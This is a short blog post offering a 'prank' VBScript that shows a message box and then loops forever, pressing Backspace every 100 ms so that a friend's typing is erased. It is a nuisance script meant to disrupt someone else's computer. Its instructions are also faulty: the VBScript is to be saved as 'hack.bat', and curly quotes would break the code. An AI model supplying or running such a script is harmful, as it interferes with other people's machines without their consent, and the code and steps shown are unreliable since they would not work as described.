Frustrate your friend by making their keyboard hit Backspace simultaneously whenever they press a key:-
Code:-
MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save as "hack.bat"
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.